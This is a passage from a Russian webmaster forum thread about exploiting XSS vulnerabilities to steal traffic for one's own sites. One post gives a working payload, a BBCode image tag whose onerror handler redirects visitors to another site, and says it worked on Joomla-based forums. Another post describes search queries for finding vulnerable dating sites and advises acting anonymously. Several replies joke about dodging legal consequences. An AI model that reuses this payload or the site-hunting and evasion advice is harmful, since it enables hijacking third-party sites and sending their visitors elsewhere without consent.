XSS уязвимость для быстрой добычи тематического трафика

(Ответов: 26, Просмотров: 16298)
Страница 2 из 3 Первая 123 Последняя
  1. Дипломник Аватар для CrazyStudentS_MiX
    • Регистрация: 03.09.2009
    • Сообщений: 195
    • Репутация: 13
    Sk8er кури античат, там очень много выкладывают пассивок, иногда даже активки, как достаточно насмотришься примеров, можешь уже и сам искать, просто очень важно проверять все формы, куда можно впихнуть свой текст, кодеры часто что-то пропускают
    • 0
  2. Опытный Аватар для stArik
    • Регистрация: 11.05.2009
    • Сообщений: 439
    • Репутация: 38
    Помнится, во всех форумах на cms joomla была XSS уязвимость, достаточно было вставить код в сообщение:
    Код:
    [img size=150]http://www.google.com/noimage.jpg"onerror="top.location.href='http://www.site.com';"[/img]
    и срабатывал редирект
    • 0
  3. Member Аватар для Mr.Evidence
    • Регистрация: 13.01.2010
    • Сообщений: 82
    • Репутация: 17
    Интересно, а можешь дать хоть пример сайта где эту дыру закрыли? желательно несколько, можно в личку

    Оффтоп: Только заметил, Регистрация у меня 13 числа, и первый мой пост под №13 К чему бы это?
    Последний раз редактировалось Mr.Evidence; 13.01.2010 в 09:06.
    • 0
  4. Banochkin.com Аватар для Sk8er
    • Регистрация: 08.09.2009
    • Сообщений: 1,799
    • Записей в дневнике: 1
    • Репутация: 91
    • Webmoney BL: ?
    Цитата Сообщение от Mr.Evidence Посмотреть сообщение
    Интересно, а можешь дать хоть пример сайта где эту дыру закрыли? желательно несколько, можно в личку
    Такую то дырку уже везде закрыть должны :)

    А вообще законно ли это, если так впихиваешь редирект? Могут ли потом за яйца взять?
    Banochkin.com — веду блог, создаю и продвигаю сайты.
    Контакты.
    • 0
  5. Member Аватар для Mr.Evidence
    • Регистрация: 13.01.2010
    • Сообщений: 82
    • Репутация: 17
    Цитата Сообщение от Sk8er Посмотреть сообщение
    Такую то дырку уже везде закрыть должны :)

    А вообще законно ли это, если так впихиваешь редирект? Могут ли потом за яйца взять?
    Не везде)) Одно время был форумный движок (помоему назывался Russia или что то подобное)так он весь в дырах был очень долго, и помоему щас есть довольно популярные форумы на этом движке, надо будет поискать.
    А за яйца подвесить могут
    • 0
  6. Опытный Аватар для stArik
    • Регистрация: 11.05.2009
    • Сообщений: 439
    • Репутация: 38
    Цитата Сообщение от Mr.Evidence Посмотреть сообщение
    Интересно, а можешь дать хоть пример сайта где эту дыру закрыли? желательно несколько, можно в личку
    Примера сайта дать не могу, зато могу дать запросы, по которым мы их искали, вот пример для uk
    http://www.google.co.uk/ie?num=100&h...=online+dating
    И так для каждой страны на её языке.
    Естественно, чтоб ничего не было за такие действия, нужно все делать анонимно.
    • 0
  7. Опытный Аватар для stArik
    • Регистрация: 11.05.2009
    • Сообщений: 439
    • Репутация: 38
    http://itua.info/news/security/22195.html интересная статья про XSS в твиттере
    • 0
  8. Banned
    • Регистрация: 08.09.2009
    • Сообщений: 1,478
    • Репутация: 80
    • Webmoney BL: ?
    Ну можно на крайняк гнуть линию "А я не знал, что это баг! Я думал фича!"
    • 0
  9. Banochkin.com Аватар для Sk8er
    • Регистрация: 08.09.2009
    • Сообщений: 1,799
    • Записей в дневнике: 1
    • Репутация: 91
    • Webmoney BL: ?
    Цитата Сообщение от stArik Посмотреть сообщение
    http://itua.info/news/security/22195.html интересная статья про XSS в твиттере
    Все быстро побежали искать инъекции в твиттере)
    Цитата Сообщение от noxon.su Посмотреть сообщение
    Ну можно на крайняк гнуть линию "А я не знал, что это баг! Я думал фича!"
    самая стандартная фраза, если что с неё бы и начал
    Banochkin.com — веду блог, создаю и продвигаю сайты.
    Контакты.
    • 0
  10. Опытный Аватар для stArik
    • Регистрация: 11.05.2009
    • Сообщений: 439
    • Репутация: 38
    Цитата Сообщение от noxon.su Посмотреть сообщение
    Ну можно на крайняк гнуть линию "А я не знал, что это баг! Я думал фича!"
    Незнание не освобождает от ответсвенности
    Цитата Сообщение от Sk8er Посмотреть сообщение
    Все быстро побежали искать инъекции в твиттере)
    Вчера тестировал, эта XSS уязвимость уже не работает
    • 0
Страница 2 из 3 Первая 123 Последняя

Похожие темы

Темы Раздел Ответов Последний пост
Способы добычи бесплатного контента
Партнерские программы 32 15.12.2009 18:51
Вирусный маркетинг как средство добычи тафика.
Партнерские программы 127 28.11.2009 11:46
Вирусный маркетинг как средство добычи тафика.
Обучающие статьи 122 27.09.2009 21:15
Ещё один способ добычи фри контента
Арбитраж, трафик 66 17.09.2009 10:44

Интересные темы

xss уязвимость

Что такое xss уязвимость, как ее можно использовать в своих интересах, читайте подробнее здесь.

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры